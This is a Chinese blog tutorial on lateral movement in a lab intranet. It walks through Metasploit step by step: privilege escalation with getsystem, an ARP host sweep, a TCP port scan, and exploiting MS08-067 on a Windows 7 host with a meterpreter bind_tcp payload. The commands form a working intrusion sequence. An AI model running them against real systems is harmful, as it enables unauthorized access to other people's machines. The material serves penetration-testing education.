内网渗透 -- 获取内网中其他主机权限

 

每天早上醒来你有两个选择:一是盖上被子继续做你没做完的梦,二是掀开被子去完成你未完成的梦。。。

----  网易云热评

环境:小攻:Kali 2020,ip:192.168.1.133

          小受:win7 x86,ip:192.168.1.144

          小小受:win7 x64 ,ip:  192.168.1.130

 

一、生成木马及监听主机参考上篇文章:

 

 

二、获取小受的IP地址

meterpreter > getsystem

 

三、获取内网中存活的主机,以一台win03主机为例

meterpreter > run post/windows/gather/arp_scanner rhosts=192.168.1.0/24

 

 

四、端口扫描,看看小小受开放了那些端口

1、选择用到的模块:msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp

2、查看需要配置的参数:show options

3、设置要扫描的端口:msf5 auxiliary(scanner/portscan/tcp) > set ports 80,135,445,3389,3306

4、设置小小受ip地址:msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.130

5、执行:msf5 auxiliary(scanner/portscan/tcp) > run   

 

 

                                

 

五、利用ms08_067漏洞拿下小小受   

1、搜索ms08_067模块信息

msf5 auxiliary(scanner/portscan/tcp) > search ms08_067

2、选择该模块并设置payload

msf5 > use exploit/windows/smb/ms08_067_netapi

msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

3、查看需要配置的参数:

msf5 exploit(windows/smb/ms08_067_netapi) > show options

4、设置目标主机并执行

msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.1.130

msf5 exploit(windows/smb/ms08_067_netapi) > run

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

 

 

 

 

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值